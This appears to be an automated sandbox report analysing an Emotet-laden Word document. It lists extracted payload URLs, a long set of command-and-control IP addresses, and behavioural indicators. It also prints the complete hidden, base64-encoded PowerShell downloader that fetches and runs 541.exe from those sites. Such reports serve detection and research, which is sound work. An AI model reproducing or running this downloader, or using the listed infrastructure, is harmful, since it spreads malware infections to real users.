Analysis
-
max time kernel
28s -
resource
win10v191014 -
submitted
25-01-2020 21:48
General
Malware Config
Extracted
http://www.yuzemin.com/wp-admin/2dWf/
https://lmheritage.com/wp-content/6Vh5hy7QE7/
http://www.videract.com/pnllsek25ksj/Fnw81309/
http://www.theophile-ministere.com/cgi-bin/vLG0JG7N/
https://icm.company/cgi-bin/c142/
Extracted
emotet
186.138.186.74:443
190.24.243.186:80
68.174.15.223:80
68.183.170.114:8080
45.79.95.107:443
192.241.143.52:8080
159.65.241.220:8080
142.93.114.137:8080
70.123.95.180:80
62.75.143.100:7080
91.242.136.103:80
109.169.86.13:8080
202.62.39.111:80
181.231.220.232:80
188.216.24.204:80
86.42.166.147:80
186.15.83.52:8080
178.79.163.131:8080
114.109.179.60:80
110.170.65.146:80
192.241.146.84:8080
119.59.124.163:8080
186.200.205.170:80
181.10.204.106:80
81.213.78.151:443
203.25.159.3:8080
151.231.7.154:80
139.162.118.88:8080
2.47.112.72:80
190.191.82.216:80
46.28.111.142:7080
165.228.195.93:80
186.68.48.204:443
200.123.183.137:443
187.230.39.69:80
207.154.204.40:8080
190.100.153.162:443
201.213.32.59:80
190.17.44.48:80
87.106.77.40:7080
181.30.61.163:80
177.103.159.44:80
138.68.106.4:7080
120.150.247.164:80
181.36.42.205:443
188.218.104.226:80
200.82.170.231:80
91.205.215.57:7080
190.70.1.69:80
190.186.164.23:80
79.7.158.208:80
58.171.38.26:80
201.213.100.141:8080
181.29.101.13:8080
77.55.211.77:8080
58.162.218.151:80
69.163.33.84:8080
87.106.46.107:8080
181.60.244.48:8080
82.196.15.205:8080
68.62.245.148:80
149.62.173.247:8080
5.196.35.138:7080
175.139.209.3:8080
70.184.69.146:80
94.200.126.42:80
124.99.167.65:443
93.144.226.57:80
79.7.114.1:80
113.190.254.245:80
152.231.89.226:80
125.99.61.162:7080
129.205.201.163:80
94.200.114.162:80
73.239.11.159:80
190.195.129.227:8090
151.237.36.220:80
204.225.249.100:7080
190.210.184.138:995
190.131.167.50:80
188.135.15.49:80
203.45.161.179:443
181.129.96.162:990
175.114.178.83:443
177.103.157.126:80
98.199.196.197:80
113.61.76.239:80
72.29.55.174:80
190.210.236.139:80
91.83.93.124:7080
81.16.1.45:80
37.120.185.153:443
73.125.15.41:80
212.71.237.140:8080
59.120.5.154:80
76.69.26.71:80
50.28.51.143:8080
185.94.252.12:80
189.201.197.98:8080
200.45.187.90:80
86.123.138.76:80
190.219.149.236:80
191.183.21.190:80
191.103.76.34:443
80.11.158.65:8080
200.58.83.179:80
144.139.56.105:80
172.104.169.32:8080
185.86.148.222:8080
203.130.0.69:80
68.183.190.199:8080
62.75.160.178:8080
195.223.215.190:80
45.8.136.201:80
2.42.173.240:80
217.199.160.224:8080
91.74.175.46:80
37.187.6.63:8080
45.73.157.243:8080
5.88.27.67:8080
181.167.96.215:80
151.80.142.33:80
216.251.83.79:80
185.243.92.42:8080
186.15.52.123:80
186.177.165.196:443
187.54.225.76:80
Signatures
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 3700 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
Powershell.exe541.exedescription pid process target process PID 3700 wrote to memory of 4724 3700 Powershell.exe 541.exe PID 4724 wrote to memory of 4680 4724 541.exe 541.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
541.exepid process 4680 541.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 3700 Powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
541.exe541.exepid process 4724 541.exe 4680 541.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4940 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE541.exe541.exepid process 4940 WINWORD.EXE 4724 541.exe 4680 541.exe -
Process spawned unexpected child process 1 IoCs
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3700 5088 Powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ec50dd262063dfc0f05309888bd9e76c316af53094c814cddd7f219d9c2035b8.doc" /o ""1⤵
- Enumerates system info in registry
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABPAGMAbQBhAGQAbQB6AGIAdgBhAGgAPQAnAFAAbgB5AGIAdABxAHYAbgB0ACcAOwAkAFEAZQByAG8AZQB4AHcAeQBhAHQAegBmAGkAIAA9ACAAJwA1ADQAMQAnADsAJABKAGUAcQBxAGIAeABzAHMAeAB3AHQAYQBtAD0AJwBSAGMAdwBvAHcAegByAGkAbQB1ACcAOwAkAEQAYQByAG4AbAB2AG4AbQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUQBlAHIAbwBlAHgAdwB5AGEAdAB6AGYAaQArACcALgBlAHgAZQAnADsAJABSAGQAYwB2AG8AbwBhAHQAaQBpAD0AJwBDAHAAZQBpAHQAdQB4AG8AcgBoAGUAawAnADsAJABaAGoAZgBuAGUAdgBrAGgAegBlAHEAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBMAGkARQBOAHQAOwAkAFAAcQBsAHcAZABpAHAAcwBiAGoAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB5AHUAegBlAG0AaQBuAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAyAGQAVwBmAC8AKgBoAHQAdABwAHMAOgAvAC8AbABtAGgAZQByAGkAdABhAGcAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADYAVgBoADUAaAB5ADcAUQBFADcALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB2AGkAZABlAHIAYQBjAHQALgBjAG8AbQAvAHAAbgBsAGwAcwBlAGsAMgA1AGsAcwBqAC8ARgBuAHcAOAAxADMAMAA5AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AdABoAGUAbwBwAGgAaQBsAGUALQBtAGkAbgBpAHMAdABlAHIAZQAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHYATABHADAASgBHADcATgAvACoAaAB0AHQAcABzADoALwAvAGkAYwBtAC4AYwBvAG0AcABhAG4AeQAvAGMAZwBpAC0AYgBpAG4ALwBjADEANAAyAC8AJwAuACIAUwBQAGAAbABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABDAHoAcgB2AGUAdgBkAG0AYQBwAHUAYgBlAD0AJwBJAGIAaQBxAGMAbABoAHYAagBwACcAOwBmAG8AcgBlAGEAYwBoACgAJABZAG0AbAByAGsAYwBkAHcAZwBjAHIAIABpAG4AIAAkAFAAcQBsAHcAZABpAHAAcwBiAGoAKQB7AHQAcgB5AHsAJABaAGoAZgBuAGUAdgBrAGgAegBlAHEALgAiAEQATwB3AE4AYABsAG8AYQBkAEYAYABJAGwARQAiACgAJABZAG0AbAByAGsAYwBkAHcAZwBjAHIALAAgACQARABhAHIAbgBsAHYAbgBtACkAOwAkAEoAdQBrAHoAcgB5AG8AbABhAGIAbQBlAHEAPQAnAE8AcABuAHIAcQBsAGMAaQBmAHYAdQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAEQAYQByAG4AbAB2AG4AbQApAC4AIgBsAEUAbgBgAEcAdABIACIAIAAtAGcAZQAgADMANQA4ADYAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAFIAVAAiACgAJABEAGEAcgBuAGwAdgBuAG0AKQA7ACQARQBpAGcAbQB6AHUAcgBwAHAAZABkAHAAPQAnAEcAbwBlAGEAbQB2AHMAZgB3AHkAJwA7AGIAcgBlAGEAawA7ACQARwBsAGYAZQB4AGQAYQByAHcAdAA9ACcAUgB2AHkAeQBhAGsAbwBhAGsAcgBjAHEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASABzAGIAegBtAGkAbABuAG8AZwBrAGwAPQAnAFAAagBvAG4AaQBtAGoAcgB3AHUAZQBtAGoAJwA=1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
-
C:\Users\Admin\541.exe"C:\Users\Admin\541.exe"2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\541.exe--e3dadc103⤵
- Suspicious behavior: EmotetMutantsSpam
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\541.exe
-
C:\Users\Admin\541.exe
-
C:\Users\Admin\541.exe
-
memory/4680-14-0x0000000002110000-0x0000000002126000-memory.dmpFilesize
88KB
-
memory/4680-15-0x0000000000400000-0x0000000000488000-memory.dmpFilesize
544KB
-
memory/4724-12-0x0000000002100000-0x0000000002116000-memory.dmpFilesize
88KB